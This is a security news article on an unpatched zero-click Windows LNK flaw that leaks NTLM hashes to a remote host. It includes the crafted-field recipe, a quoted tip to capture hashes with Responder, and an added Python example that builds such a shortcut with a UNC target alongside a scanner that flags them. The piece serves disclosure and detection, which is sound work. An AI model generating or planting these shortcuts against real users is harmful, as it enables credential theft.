Unpatched Windows Shortcut Vulnerability Lets Attackers Execute Remote Code

Security researcher Nafiez has disclosed a previously unreported vulnerability in how Windows handles LNK files, better known as shortcuts. The researcher characterizes it as zero-click: Explorer acts on a malicious shortcut as soon as the user browses to the folder containing it, with no click on the file required. The published proof-of-concept (PoC) demonstrates a silent outbound network connection from the victim machine that leaks NTLM authentication material, which the researcher frames as a stepping stone to remote code execution. Despite the working PoC, Microsoft has declined to fix the issue, stating that it "does not meet their security bar for servicing."

The vulnerability lies in how Explorer parses specific structures inside a shortcut file. By crafting an LNK file whose EnvironmentVariableDataBlock carries a UNC path, an attacker can make the victim's machine open a network connection to an attacker-controlled host simply because the user opened a folder containing the malicious shortcut.

“When a user accesses a folder that contains the LNK file, Explorer will parse any files stored in that folder… this is where the initialization of the file gets ready to be called/executed,” Nafiez elaborated in his technical analysis.

This particular vulnerability raises alarms due to its nature; it does not require the user to actively click on the shortcut. Merely browsing a directory that houses the malicious LNK file is enough to trigger the attack.

PoC Details Released

The exploit operates by manipulating several critical elements within the LNK file structure:

  • Setting the HasArguments flag in the header's LinkFlags together with an EnvironmentVariableDataBlock, so that Explorer resolves the target from the data block rather than from a normal link target
  • Embedding a UNC path (e.g., \\192.168.44.128\c) as the target inside that block
  • Setting the block's BlockSize and BlockSignature to the values the shell link format defines for an EnvironmentVariableDataBlock (0x314 and 0xA0000001 respectively, per Microsoft's MS-SHLLINK specification), so the block is accepted and acted on

Windows Explorer handles these crafted files through a chain of COM interfaces, including IInitializeNetworkFolder and IShellFolder2, which manage network resources. That processing starts automatically when the folder is enumerated, which is why the outbound connection, and the NTLM authentication attempt that rides on it, happens without any visible prompt.
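To make the fields above concrete, the following Python is an added example, not the researcher's PoC or any code from the original post. It builds a minimal shell link from the public MS-SHLLINK layout (header, an optional COMMAND_LINE_ARGUMENTS string, an EnvironmentVariableDataBlock, a terminal block) entirely in memory, then runs a small triage scanner over it that flags shortcuts whose EnvironmentVariableDataBlock resolves to a UNC path. The address 192.168.44.128 is the one the article quotes; the "HasArguments without any link target" heuristic is this example's own assumption, not something the article or the spec states.

```python
"""Minimal MS-SHLLINK builder and LNK triage scanner (added example)."""
import struct
from typing import Dict, List, Optional, Tuple

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_ARGUMENTS = 0x20
IS_UNICODE = 0x80
HAS_EXP_STRING = 0x200
STRING_DATA_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                      (0x20, "arguments"), (0x40, "icon_location"))

# EnvironmentVariableDataBlock (MS-SHLLINK 2.5.4): 8-byte block header,
# 260-byte ANSI target, 520-byte UTF-16LE target, 0x314 bytes in total.
ENV_BLOCK_SIGNATURE = 0xA0000001
ENV_BLOCK_SIZE = 0x314


def build_sample_lnk(target: str, args: str = "") -> bytes:
    """Constructed sample: the smallest valid shell link whose only target is an
    EnvironmentVariableDataBlock, optionally with COMMAND_LINE_ARGUMENTS.
    Built from the public spec to exercise the scanner below; not the PoC."""
    assert len(target) < 260, "target must fit the 260-byte ANSI field"
    flags = IS_UNICODE | HAS_EXP_STRING | (HAS_ARGUMENTS if args else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags,
                         0,            # FileAttributes
                         0, 0, 0,      # Creation/Access/Write FILETIME
                         0, 0, 1,      # FileSize, IconIndex, ShowCommand=SW_SHOWNORMAL
                         0, 0, 0, 0)   # HotKey, Reserved1, Reserved2, Reserved3
    string_data = b""
    if args:  # StringData: CountCharacters, then UTF-16LE chars, no terminator
        string_data = struct.pack("<H", len(args)) + args.encode("utf-16-le")
    env_block = (struct.pack("<II", ENV_BLOCK_SIZE, ENV_BLOCK_SIGNATURE)
                 + target.encode("latin-1", "replace").ljust(260, b"\x00")
                 + target.encode("utf-16-le").ljust(520, b"\x00"))
    terminal_block = struct.pack("<I", 0)  # ExtraData ends with a value < 4
    return header + string_data + env_block + terminal_block


def parse_lnk(data: bytes) -> Dict:
    """Walk the header, optional LinkTargetIDList/LinkInfo, StringData and ExtraData."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    strings: Dict[str, str] = {}
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_DATA_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            raw = data[pos:pos + nbytes]
            strings[name] = raw.decode("utf-16-le") if unicode else raw.decode("latin-1")
            pos += nbytes
    blocks: List[Tuple[int, int, bytes]] = []
    while pos + 4 <= len(data):
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 8 or pos + size > len(data):  # TerminalBlock, or a truncated block
            break
        sig = struct.unpack_from("<I", data, pos + 4)[0]
        blocks.append((size, sig, data[pos + 8:pos + size]))
        pos += size
    return {"flags": flags, "strings": strings, "blocks": blocks}


def env_block_target(parsed: Dict) -> Optional[str]:
    """Return the target stored in the EnvironmentVariableDataBlock, if any."""
    for size, sig, body in parsed["blocks"]:
        if sig == ENV_BLOCK_SIGNATURE and size == ENV_BLOCK_SIZE and len(body) >= 780:
            uni = body[260:780].decode("utf-16-le", "replace").split("\x00", 1)[0]
            ansi = body[:260].split(b"\x00", 1)[0].decode("latin-1")
            return uni or ansi
    return None


def is_suspicious(data: bytes) -> List[str]:
    """Triage: reasons this shortcut deserves a closer look (empty list if none)."""
    reasons = []
    parsed = parse_lnk(data)
    target = env_block_target(parsed)
    if target is not None:
        if target.startswith("\\\\"):
            reasons.append(f"EnvironmentVariableDataBlock resolves to UNC path {target}")
        if not parsed["flags"] & HAS_EXP_STRING:
            reasons.append("EnvironmentVariableDataBlock present without HasExpString flag")
    # Heuristic (this example's assumption): arguments with no ordinary link target
    # means the only thing Explorer can resolve is the environment-variable block.
    if parsed["flags"] & HAS_ARGUMENTS and not parsed["flags"] & (HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO):
        reasons.append("HasArguments set with no LinkTargetIDList or LinkInfo")
    return reasons


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:  # e.g. python lnk_triage.py *.lnk
        with open(path, "rb") as fh:
            for reason in is_suspicious(fh.read()):
                print(f"{path}: {reason}")
```

Run it against the shortcuts in a user's Downloads or a suspect share to list the ones worth pulling for analysis. A fuller scanner would also walk LinkInfo's CommonNetworkRelativeLink, since a UNC target can live there too, but the environment-variable block is the field the article's PoC relies on.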

Microsoft has defended its decision not to patch this vulnerability by arguing that its Mark of the Web (MOTW) feature offers sufficient protection. MOTW is a tag (the Zone.Identifier alternate data stream) that browsers and mail clients attach to files they save from the internet; Windows checks for it and shows a security warning before running such a file. It only helps for files that arrived through a channel that writes the tag, so a shortcut that reaches a folder by some other route carries no mark at all.

This stance mirrors Microsoft’s response to previous LNK vulnerabilities. According to their security servicing criteria, the company addresses vulnerabilities only if they “violate the goal or intent of a security boundary or security feature” and meet their severity threshold for servicing.

“Once you compile the code, run the executable to generate the LNK file and ensure to run the Responder tool to capture NTLM Hash,” Nafiez advised.

Security experts are voicing concerns that relying solely on MOTW may not be adequate, as there are known techniques to bypass these protections. Researchers at Elastic Security Labs recently identified a method known as “LNK stomping,” which has been utilized by threat actors for at least six years to circumvent MOTW controls.

This is not the first instance of LNK files being exploited. Microsoft has previously addressed critical vulnerabilities in LNK files, including a remote code execution flaw in 2017 and another in 2010 that was actively exploited.

LNK files have increasingly become a favored attack vector for threat actors. As security researchers from Intezer observe, “LNK files (aka Windows shortcuts) may seem simple, but threat actors can use them to execute other binaries and inflict great harm.”

The availability of the proof-of-concept code amplifies concerns that this vulnerability could soon be weaponized by malicious actors in real-world scenarios.

